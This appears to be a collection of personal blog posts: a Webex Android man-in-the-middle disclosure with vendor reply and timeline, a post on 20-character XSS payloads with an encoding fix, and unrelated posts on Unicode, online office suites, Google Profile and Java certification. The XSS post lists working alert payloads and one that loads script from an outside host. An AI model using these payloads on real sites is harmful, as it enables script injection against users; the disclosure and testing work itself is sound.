WebEx Meetings are vulnerable to MITM

In my free time, I was looking at some Android applications and noticed that I was able to intercept SSL traffic for the Webex Meetings app. When I explored it further, I found that the Webex Meetings mobile app accepts self-signed certificates, and no certificate pinning is enabled either.

This makes the Webex Meetings app vulnerable to a man-in-the-middle (MITM) attack: a client that accepts any certificate cannot tell the real server from an attacker's proxy, so the encryption on its own provides no authentication of the other end.

Users of this app, if connected to a public Wi-Fi hotspot, can be targeted by anyone on the same network who can put themselves on the path to the server. If connected to a rogue Wi-Fi hotspot, the Wi-Fi provider can read the data passed between the app and the server. Malware on the device can also exploit this behaviour to intercept sensitive data while it is in transit.

Properly validated TLS (SSL) provides confidentiality and integrity for data passed from point A to point B; without certificate validation the channel is encrypted but not authenticated, and an attacker who can redirect the connection can decrypt and modify it.
OWASP also puts 'Insecure Communication' in 3rd position (M3) in its 2016 Mobile Top 10 list of mobile application vulnerabilities:
https://www.owasp.org/index.php/Mobile_Top_10_2016-M3-Insecure_Communication

In simpler terms, if you like joining your Webex meetings from free Wi-Fi hotspots in your gym or coffee shop, then your meetings may not be secret anymore.

Vulnerable version:

I tested the Webex Meetings Android app, version 10.6.0.21060208, on a Samsung S8 running Android 8.0.
As per vendor’s response, it seems all Webex mobile clients have similar behavior.

Vendor Response :

Hi Pankaj, after discussing with our development team, I’ve learned that the Webex mobile client accepts self-signed certificates because the Webex meetings component also allows for deployments using self-signed certificates. Similarly, because the Webex mobile client has to be used with so many different sites, certificate pinning is also not enabled.

See the documentation: https://www.cisco.com/c/en/us/td/docs/collaboration/CWMS/3_0/Administration_Guide/cwms_b_administration-guide-3-0.html

Page 219 of administrator guide instructs how to import self-signed certificate on mobile device to join meetings. There are also instructions for iOS there as well.

Page 256 of administrator guide instructs certificate management on the meetings server itself, including self-signed certificates.

The guide also mentions that the client warns on accepting the self-signed certificate, and users should make sure the application is genuine before accepting Connect.

These choices are consciously made by the business and documented for customers. As such, we do not consider them vulnerabilities. Although, you are correct, these configurations leave open the possibility of some attacks intended to defeat some SSL protections from attackers with privileged network positions. However, OCSP stapling is enabled as a hardening measure to verify SSL certificates.

Due to requirements of supporting applications using self-signed certificates, the Webex business unit will not make any changes to address your findings. You are of course free to make public your findings. If you do so, please include references to the above documentation.

Thank you again for your reports.

Timeline:

03/10/2018 – Issue reported to Cisco PSIRT
03/10/2018 – Report acknowledged by the incident manager and I was asked for more information
03/10/2018 – Shared the required details. Shared some screenshots from Packet Capture app.
03/27/2018 – I was asked if I could gather more information.
04/10/2018 – I shared some information again.
10/05/2018 – Reached out to the case manager and PSIRT DL for an update.
10/17/2018 – Reached out to PSIRT DL again for an update.
03/13/2019 – Reached out to PSIRT DL again for an update and asking permission for a public disclosure.
03/15/2019 – Got a response that the previous case manager had moved on to a different position and that the dev team was not able to confirm my report, so there were no fixes.
03/20/2019 – Got the response confirming that Webex mobile clients accept self-signed cert and it is an intended behavior.

04/30/2019 – Requested public disclosure, as even though Webex said the behaviour is covered in the 'admin' documentation, I did not think Webex users were aware of the inherent risks.
06/20/2019 – Shared a draft write up with the PSIRT team
06/24/2019 – Released the advisory for the public.

Credits:

No CVE or bounty was awarded, as the vendor does not consider it a security issue. The vendor credited me for reporting this bug in their public bug release notes.

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvi63354

Update :
Someone pointed out that this issue was previously reported for the iOS app in 2012; the CVE for that issue is CVE-2012-6399.

Popping up an XSS alert via a field which does not accept more than 20 characters

While testing an app, a text field on one of the pages was not accepting more than 20 characters (server-side validation). I inserted the following probe string to check for XSS (from RSnake's XSS cheat sheet):

'';!--"<XSS>=&{()}

and checked the HTML source for <XSS versus &lt;XSS. Since <XSS appeared verbatim in the HTML source, the field's value was being reflected without output encoding, so it was vulnerable to cross-site scripting. The length limit only constrains the payload; it does not neutralise it.

I now wanted to get a popup. The only problem was that I was used to alert(1), and here I needed a smaller script. I tried to create or find a script of 20 characters or fewer but could not find anything. At that point a random thought came to my mind: what is the smallest payload that pops up an alert? I asked this question on the IT Security Stack Exchange forum. I was also able to make a few payloads myself. Here are those payloads, as well as the payload from one of the answers (each is exactly 20 characters):

<a href=http://a.by>
<a onclick=alert(2)>
<b onclick=alert(2)>
<script src=//h4k.me

Update (7th March, 2019): This is a very old post and may be obsolete now. Since someone replied to that question in 2017, I guess the following may be the smallest payload to pop up an alert now. I need to check.

<svg/onload=alert()>
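As an added example (not code from this post or from the application that was tested), here is the check and the fix in JavaScript: a minimal HTML output encoder, the field rendered with and without it for RSnake's probe string, the "<XSS versus &lt;XSS" test on the resulting source, and the length of each payload listed above measured against the 20-character limit. The rendering templates are constructed for illustration.

```javascript
// Added example, not from the original post. Demonstrates the check described
// above (does "<XSS" survive into the HTML source?), the missing control
// (output encoding), and each payload's length against the 20-char limit.

// Probe string from RSnake's XSS cheat sheet, as quoted in the post.
const PROBE = "'';!--\"<XSS>=&{()}";

// Payloads listed in the post. A server-side limit of 20 characters stops none of them.
const PAYLOADS = [
  '<a href=http://a.by>',
  '<a onclick=alert(2)>',
  '<b onclick=alert(2)>',
  '<script src=//h4k.me',
  '<svg/onload=alert()>',
];

// HTML entity encoding, correct for text placed inside an element body or a
// quoted attribute value. Other contexts (JavaScript, URLs, CSS) need their own encoders.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// How the vulnerable page behaved: the stored value is reflected verbatim
// into the page (constructed template, not the real application's markup).
function renderUnsafe(value) {
  return `<td class="note">${value}</td>`;
}

// The fix: encode on output, at the point where the value enters HTML.
function renderSafe(value) {
  return `<td class="note">${htmlEncode(value)}</td>`;
}

// The check from the post: "<XSS" in the source means the value was not
// encoded; "&lt;XSS" means it was.
function reflectsUnencoded(html) {
  return html.includes('<XSS') && !html.includes('&lt;XSS');
}

// Does a payload fit under the server-side length limit?
function fitsLimit(payload, limit = 20) {
  return payload.length <= limit;
}

// Length of every payload, so the limit can be checked at a glance.
function payloadLengths() {
  return PAYLOADS.map((p) => ({ payload: p, length: p.length }));
}

module.exports = { PROBE, PAYLOADS, htmlEncode, renderUnsafe, renderSafe, reflectsUnencoded, fitsLimit, payloadLengths };
```

Running reflectsUnencoded(renderUnsafe(PROBE)) reproduces the finding (true), and the same check on renderSafe(PROBE) returns false. The point worth keeping from this is that the length limit is an input restriction, not an output control: every payload above is exactly 20 characters, so only encoding at the output point closes the hole.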

ABC of Multibyte Characters….

So how many times have you seen strange characters in an email or on a web site? How many times, as a developer, have you seen your code or content converted to '?' and users complained?

Previously, the internet was limited to English (ASCII), but as soon as it started going global, ASCII could no longer cope.

If you want to read the ABC of multibyte characters and character sets, read this article by Joel, one of my favourite writers:

http://www.joelonsoftware.com/articles/Unicode.html

Online Office Suite

Remember the days when the MS Office suite was a must for any office job. I salute Microsoft for the whole Office idea and product suite. It definitely was one of the coolest products of that era.

The office suite (though not Microsoft Office) has shifted online now. Thanks to some great work by Google Docs, Zoho and ThinkFree, you can now create your document, spreadsheet and presentation online and share them with your friends. You and your friends can simultaneously work on a document or presentation. This is called 'collaboration'.

This whole concept can also be called SaaS (Software as a Service), because these SaaS vendors let you use their software as a pay-per-use service. You use it without even installing it on your machine, so there is no initial demand on your processor or disk space to run software that is actually a service.

I use Google Docs and Zoho. Both tools are excellent and easy to use.

There is also news of Microsoft entering this field with its online MS Office. Adobe has also bought Buzzword, which is an online document creation utility. Apple has also entered this market with its iBook, which presently works for Apple users only.

So, is anyone left? All the big players are competing here to give you the ultimate experience with their online office suite products.

Are you still on MS Word?? 😛

Google Profile

I always hate filling in the section popularly known as 'About Me'. How can I type those 1024 (or some other random number of) characters every time I sign up to a new site? Some sites don't even allow copy and paste.

When they could come up with the 'OpenID' thing, why did no one think about the 'About Me' section? After all, this section is the next most important thing after your user ID and password.

As if Google was listening, they thought about it, and they now allow a user to create a public profile which can be shared across Google services. Presently it supports only Google Maps and Google Reader, but hopefully, in future, they will integrate 'Google Profile' with all their services.

For people who like to vary their profile information from one site to another, Google could provide an option not to use the Google Profile, but I really liked this idea. This great idea has already saved me some time. How?

I have already created a Google Profile and like to use it wherever I can. At least now I can copy my 'About Me' information and paste it wherever it is required. For example, I have used the same information in my Blogger profile and in one of my blogs.

Create yours, or see if you already have one 🙂

SCJP 1.6 conquered!!!

I never wanted to write any technical stuff because I know how boring it is! But then I realised: what if I try to explain technical things in a very, very simplified way? I mean, how I understand technical things, how I make sense of them and how I actually execute them.

Let me start with my first official certification:

I cleared the Sun Certified Java Programmer (SCJP) 1.6 exam on 2nd February with 86%. I missed the 90s, and that's OK :).

I would suggest:

1: Buy the Kathy Sierra/Bert Bates book, which was written specifically for the SCJP exam.

2: Play these games whenever you are free in your office. I bet they will take 60% of your time :). When you start scoring 100% in these games, you can THINK of becoming Sun Certified.

http://www.javaranch.com/game.jsp

http://www.javaranch.com/game/game2.jsp

3: Keep solving mock exams and visiting Java sites and forums. Mock exams show your grey areas, and that is really important. I suggest visiting JavaBlackBelt, JavaPassion and JavaRanch. Once you go through these sites, you will fall in love with them.

http://faq.javaranch.com/java/ScjpMockTests

4: Most important, learn by sharing. I spent a few days with Samrat solving some mock tests together. We challenged each other on the questions and did not allow each other to give an answer without a genuine reason. The strategy worked out, and we became quite familiar with the features newly added in Sun's 1.6. Thanks Som 😉